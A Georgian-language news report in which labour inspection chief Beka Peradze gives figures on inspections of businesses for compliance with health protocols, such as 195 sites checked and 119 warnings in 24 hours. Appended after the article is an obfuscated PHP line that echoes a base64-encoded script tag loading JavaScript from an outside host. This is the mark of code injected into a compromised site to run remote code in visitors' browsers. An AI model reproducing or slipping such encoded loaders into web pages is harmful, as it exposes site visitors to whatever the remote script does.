celsiusi
ავერსი საქკაბელი
შრომის პირობების ინსპექტირების დეპარტამენტის უფროსის ბექა ფერაძის განცხადებით, გასულ 24 საათში, სულ ზედამხედველობა 195 ობიექტზე განხორციელდა, საიდანაც ზეპირსიტყვიერი გაფრთხილება 119-მა ობიქტმა მიიღო. ამის შესახებ ფერაძემ მთავრობის ადმინისტრაციაში გამართულ ბრიფინგზე განაცხადა.
 
მისივე თქმით, პირველადი ინსპექტირება პროტოკოლის მოთხოვნების დაცვასთან დაკავშირებით 45 ობიექტზე განხორციელდა და დადგინდა, რომ ისინი მოთხოვნებს აკმაყოფილებდნენ.
 
„მოგახსენებთ, მონიტორინგის შედეგებს, რომელიც გასულ 24 საათში განხორციელდა. სულ ზედამხედველობა განხორციელდა - 195 ობიექტზე, საიდანაც ზეპირსიტყვიერი გაფრთხილება 119 ობიექტზე გაიცა. პირველადი ინსპექტირება განხორციელდა პროტოკოლის მოთხოვნების დაცვასთან დაკავშირებით 45 ობიექტზე და დადგინდა, რომ მოთხოვნებს აკმაყოფილებდნენ, ასევე 31 ობიექტზე რემონიტორინგი განხორციელდა და დაგინდა, რომ ჯანდაცვის მინისტრის მიერ დადგენილ მოთხოვნებს აკმაყოფილებდა. ზოგადად, სტატისტიკური მონაცემები, 28 ნოემბრიდან 15 დეკემბრის საანგარიშო საზედამხედველო უწყებების მიერ განხორციელდა 31 543 ობიექტზე, რომელთაგან 21 110 ობიექტზე სარეკომენდაციო ხასიათის ინსპექტირება გაიცა, საქმიანობა შეუჩერდა 6 018 ობიექტს და რეკომენდაციების აღსრულებაზე ჯამში განხორციელდა 597 ობიექტის შემოწმება და სამწუხაროდ, დაჯარიმდა 30 ობიექტი, სადაც აღინიშნა კრიტიკული შეუსაბამობა. ჯამში, პროტოკოლის მოთხოვნების დაცვასთან დაკავშირებით, ვგულისხმობ, სექტორული მიმართულებით რეკომენდაციებს, რომელიც ჯანდაცვის მინისტრის შესაბამისი ბრძანებითაა დამტკიცებული ინსპექტირება განხორციელებულია - 3779 ობიექტზე", - განაცხადა ფერაძემ.
1464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");